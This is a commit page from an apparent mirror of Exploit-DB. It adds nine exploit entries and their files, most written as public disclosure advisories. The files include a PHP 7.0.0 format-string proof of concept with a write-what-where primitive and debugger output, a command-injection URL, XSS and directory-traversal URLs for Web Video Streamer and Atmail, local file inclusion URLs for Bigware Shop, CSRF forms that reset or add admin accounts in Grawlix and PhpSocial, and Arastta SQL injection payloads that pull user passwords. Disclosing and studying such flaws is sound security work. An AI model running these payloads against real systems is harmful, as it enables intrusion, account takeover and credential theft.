bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-12-24

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-12-24 05:03:30 +00:00
parent 641d0b194c
commit 2497fa0144
10 changed files with 522 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
files.csv
View file

@ -35330,3 +35330,12 @@ id,file,description,date,author,platform,type,port
39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0 39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
39078,platforms/php/webapps/39078.txt,"Web Video Streamer Multiple Security Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0
39079,platforms/php/webapps/39079.txt,"Atmail WebMail Message Attachment File Name Reflected XSS",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0
39080,platforms/php/webapps/39080.txt,"Atmail WebMail searchResultsTab5 filter Parameter Reflected XSS",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0
39081,platforms/php/webapps/39081.txt,"Atmail WebMail INBOX.Trash mailId Parameter Reflected XSS",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0
39082,platforms/multiple/dos/39082.txt,"PHP 7.0.0 - Format String Vulnerability",2015-12-23,"Andrew Kramer",multiple,dos,0
39083,platforms/php/webapps/39083.txt,"Bigware Shop 2.3.01 - Multiple Local File Inclusion Vulnerabilities",2015-12-23,bd0rk,php,webapps,80
39084,platforms/php/webapps/39084.txt,"Grawlix 1.0.3 - CSRF Vulnerability",2015-12-23,"Curesec Research Team",php,webapps,80
39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection Vulnerabilities",2015-12-23,"Curesec Research Team",php,webapps,80
39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - CSRF Vulnerability",2015-12-23,"Curesec Research Team",php,webapps,80

Can't render this file because it is too large.

124
platforms/multiple/dos/39082.txt Executable file
View file

@ -0,0 +1,124 @@
Overview
--------------------------------------------
A fun little format string vulnerability exists in PHP 7.0.0 due to how
non-existent class names are handled. From my limited research I
believe this issue is likely exploitable for full code execution (see
test script below). This issue does not appear to be present in
previous PHP versions and has been patched in version 7.0.1. If you
build a working exploit, drop me a line, I'd love to see (andrew at
jmpesp dot org). Shout out to the PHP team for fixing this so quickly
and for building a great product. Greetz to my DSU crew.
Timeline
--------------------------------------------
12/11/2015: Discovered
12/12/2015: Reported to PHP team
12/13/2015: Patch accepted and committed
12/17/2015: PHP 7.0.1 released containing patch
12/22/2015: Publicly disclosed
Vulnerability/Patch
--------------------------------------------
diff -rup php-7.0.0_old/Zend/zend_execute_API.c
php-7.0.0_new/Zend/zend_execute_API.c
--- php-7.0.0_old/Zend/zend_execute_API.c 2015-12-01 07:36:25.000000000
-0600
+++ php-7.0.0_new/Zend/zend_execute_API.c 2015-12-12 12:24:24.999391117
-0600
@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc
zend_vspprintf(&message, 0, format, va);
if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {
- zend_throw_error(exception_ce, message);
+ zend_throw_error(exception_ce, "%s", message);
} else {
zend_error(E_ERROR, "%s", message);
}
Proof of Concept #1 (simple segfault)
--------------------------------------------
<?php $name="%n%n%n%n%n"; $name::doSomething(); ?>
Proof of Concept #2 (write-what-where primitive)
--------------------------------------------
andrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php
<?php
ini_set("memory_limit", "4G"); // there's probably a much cleaner way to
do this
$rdx = 0x42424242; // what
$rax = 0x43434343; // where
$name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax -
34)); // your offsets may differ.
$name::doSomething();
?>
andrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php
GNU gdb (GDB) 7.10
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show
copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from sapi/cli/php...done.
(gdb) r /tmp/test.php
Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x0000000000672935 in xbuf_format_converter
(xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\001',
fmt=<optimized out>, ap=0x7fffffffa658)
at /tmp/php-7.0.0_64/main/spprintf.c:744
744 *(va_arg(ap, int *)) = is_char? (int)((smart_string
*)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);
(gdb) i r
rax 0x43434343 1128481603
rbx 0x7fffb2800016 140736188121110
rcx 0x6e 110
rdx 0x42424242 1111638594
rsi 0x7fffffff9db0 140737488330160
rdi 0x7fffffffa658 140737488332376
rbp 0x1 0x1
rsp 0x7fffffff9d50 0x7fffffff9d50
r8 0x7fffffff9db0 140737488330160
r9 0x7fffb2800016 140736188121110
r10 0x0 0
r11 0x0 0
r12 0x20 32
r13 0x7fffffffa610 140737488332304
r14 0x0 0
r15 0x4242423a 1111638586
rip 0x672935 0x672935 <xbuf_format_converter+1845>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) x/1i $rip
=> 0x672935 <xbuf_format_converter+1845>: mov DWORD PTR [rax],edx
(gdb)

16
platforms/php/webapps/39078.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/65350/info
Web Video Streamer is prone to following multiple security vulnerabilities:
1. Multiple cross-site scripting vulnerabilities
2. A directory-traversal vulnerability
3. A command-injection vulnerability
A remote attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and gain access to sensitive information, which may aid in launching further attacks.
Web Video Streamer 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/webstreamer-master/player.php?name=drops.avi&file=drop.avi';ls>/tmp/foo;a'&type=video/mp4&t=1389685059
http://www.example.com/webstreamer-master/index.php?dir=../../../ XSS:
http://www.example.com/webstreamer-master/player.php?name=%3Cscript%3Ealert%281%29%3C/script%3Etest
http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E

9
platforms/php/webapps/39079.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/65408/info
Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Atmail 7.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/[XSS]

9
platforms/php/webapps/39080.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/65408/info
Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Atmail 7.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=[XSS]

9
platforms/php/webapps/39081.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/65408/info
Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Atmail 7.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=[XSS]

39
platforms/php/webapps/39083.txt Executable file
View file

@ -0,0 +1,39 @@
# Title: Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Vendor: http://www.bigware.de
# Download: http://www.bigware.de/download/bigware_software_-_vollversion/Bigware_Shop.zip
Proof-of-Concept1:
/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
**********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
**********************************************************************
[+]Sploit1: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof-of-Concept2:
/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
*********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
*********************************************************************
[+]Sploit: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php
=> Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'.
=> Vendor-Solution: Please declare this parameter before require.
***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom***
MERRY CHRISTMAS BRO'S! :)

73
platforms/php/webapps/39084.txt Executable file
View file

@ -0,0 +1,73 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Grawlix 1.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.getgrawlix.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Description
Grawlix is a CMS for publishing comics, which is written in PHP. In version
1.0.3, it does not have CSRF protection, which means that an attacker can
perform actions for a victim, if the victim visits an attacker controlled site
while logged in.
An attacker can for example change the password of an existing admin account,
which may in turn lead to code execution via a different vulnerability in the
admin area.
3. Proof of Concept
Change admin password:
<html>
<body>
<form action="http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php" method="POST">
<input type="hidden" name="username[1]" value="admin" />
<input type="hidden" name="email[1]" value="admin@example.com" />
<input type="hidden" name="password[1]" value="admin" />
<input type="hidden" name="confirm_password[1]" value="admin" />
<input type="hidden" name="submit" value="save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-CSRF-128.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

160
platforms/php/webapps/39085.txt Executable file
View file

@ -0,0 +1,160 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Arastta 1.1.5
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://arastta.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Arastta is an eCommerce software written in PHP. In version 1.1.5, it is
vulnerable to two SQL injection vulnerabilities, one normal injection when
searching for products via tags, and one blind injection via the language
setting. Both of them require a user with special privileges to trigger.
3. SQL Injection 1
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is an SQL Injection when retrieving products.
Currently, only the "filter" variable is vulnerable. Note that the "tag_name"
variable would also be vulnerable to SQL injection, if there wasn't a filter
that forbid single quotes in the URL. As defense in depth, it might be a good
idea to sanitize that value here as well.
Note that an account with the right "Catalog -> Filters" is needed to exploit
this issue.
Proof of Concept
POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1
tag_text[][value]=abc') union all select password from gv4_user -- -
Code
/admin/model/catalog/product.php
public function getTags($tag_name, $filter_tags = null) {
[...]
$query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter);
/admin/controller/catalog/product.php
public function autocomplete() {
[...]
if (isset($this->request->get['tag_name'])) {
$this->load->model('catalog/product');
if (isset($this->request->get['tag_name'])) {
$tag_name = $this->request->get['tag_name'];
} else {
$tag_name = '';
}
$filter = null;
if(isset($this->request->post['tag_text'])) {
$filter = $this->request->post['tag_text'];
}
$results = $this->model_catalog_product->getTags($tag_name, $filter);
foreach ($results as $result) {
$json[] = array(
'tag' => $result,
'tag_id' => $result
);
}
}
4. SQL Injection 2
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is a second order timing based SQL injection when choosing the language
setting.
An admin account with the right "Setting -> Setting" is needed to exploit this
issue.
Alternatively, a user with the right "Localisation -> Languages" can inject a
payload as well. However, a user with the right "Setting -> Setting" is still
needed to choose the malicious language to trigger the payload.
Proof of Concept
Visit the setting page:
http://localhost/Arastta/admin/index.php?route=setting/setting
For the config_language and config_admin_language parameters use:
en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) -- -
Visiting any site will trigger the injected code.
Code
/Arastta/system/library/utility.php
public function getDefaultLanguage(){
if (!is_object($this->config)) {
return;
}
$store_id = $this->config->get('config_store_id');
if (Client::isAdmin()){
$sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'";
} else {
$sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'";
}
$query = $this->db->query($sql);
$code = $query->row['value'];
$language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'");
return $language->row;
}
5. Solution
This issue was not fixed by the vendor.
6. Report Timeline
11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

74
platforms/php/webapps/39086.txt Executable file
View file

@ -0,0 +1,74 @@
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: PhpSocial v2.0.0304_20222226
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Webite: http://phpsocial.net
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Description
PhpSocial is a social networking software written in PHP. In version v2.0.0304,
it does not have CSRF protection, which means that an attacker can perform
actions for a victim, if the victim visits an attacker controlled site while
logged in.
3. Proof of Concept
Add a new admin:
<html>
<body>
<form action="http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/admin/AdminAddViewadmins.php" method="POST">
<input type="hidden" name="admin_username" value="admin2" />
<input type="hidden" name="admin_password" value="admin" />
<input type="hidden" name="admin_password_confirm" value="admin" />
<input type="hidden" name="admin_name" value="admin2" />
<input type="hidden" name="admin_email" value="admin2@example.com" />
<input type="hidden" name="task" value="addadmin" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
11/21/ Contacted Vendor (no reply)
2015
12/10/ Tried to remind vendor (no email is given, security@phpsocial.net does
2015 not exist, and contact form could not be used because the website is
down)
12/21/ Disclosed to public
2015
Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany